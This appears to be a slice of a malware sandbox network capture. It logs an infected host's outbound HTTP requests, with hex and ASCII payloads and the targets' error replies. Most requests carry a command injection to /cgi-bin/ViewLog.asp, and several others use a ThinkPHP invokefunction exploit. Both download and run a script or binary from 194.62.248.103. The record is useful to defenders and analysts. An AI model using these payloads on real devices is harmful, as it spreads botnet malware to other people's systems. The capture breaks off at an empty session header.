                                                        Apr 14, 2024 16:36:11.323704958 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:13.243592978 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:17.082909107 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:24.761868954 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:40.120040894 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:12.115350962 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        466192.168.2.235691095.110.190.1598080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:10.339523077 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:10.661125898 CEST476INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 14:36:10 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.27
                                                        Content-Length: 217
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        467192.168.2.235625631.18.216.548080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:10.347616911 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:10.677938938 CEST498INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:11 GMT
                                                        Server: Apache
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 33 30 32 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 302 Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        468192.168.2.234709494.122.106.2268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:10.360625029 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        469192.168.2.2340288112.172.214.8580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:10.479079962 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:10.767931938 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        470192.168.2.2346266112.240.60.7580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:10.505850077 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:10.823823929 CEST187INHTTP/1.0 400 Bad request
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>
                                                        Apr 14, 2024 16:36:10.910326958 CEST187INHTTP/1.0 400 Bad request
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>
                                                        Apr 14, 2024 16:36:11.013294935 CEST187INHTTP/1.0 400 Bad request
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        471192.168.2.2346284112.240.60.7580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:10.804516077 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:11.118309975 CEST187INHTTP/1.0 400 Bad request
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>
                                                        Apr 14, 2024 16:36:11.204235077 CEST187INHTTP/1.0 400 Bad request
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>
                                                        Apr 14, 2024 16:36:11.300259113 CEST187INHTTP/1.0 400 Bad request
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        472192.168.2.2346288112.240.60.7580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:10.804569960 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:11.123316050 CEST187INHTTP/1.0 400 Bad request
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>
                                                        Apr 14, 2024 16:36:11.209217072 CEST187INHTTP/1.0 400 Bad request
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>
                                                        Apr 14, 2024 16:36:11.305074930 CEST187INHTTP/1.0 400 Bad request
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        473192.168.2.235108695.111.198.24380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:10.908446074 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:11.238924026 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        474192.168.2.235589631.136.136.1568080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:11.318435907 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:12.283843994 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:14.203524113 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:18.106780052 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:25.785837889 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:41.143605947 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:12.115345001 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        475192.168.2.235788431.136.127.1538080
                                                        TimestampBytes transferredDirectionData
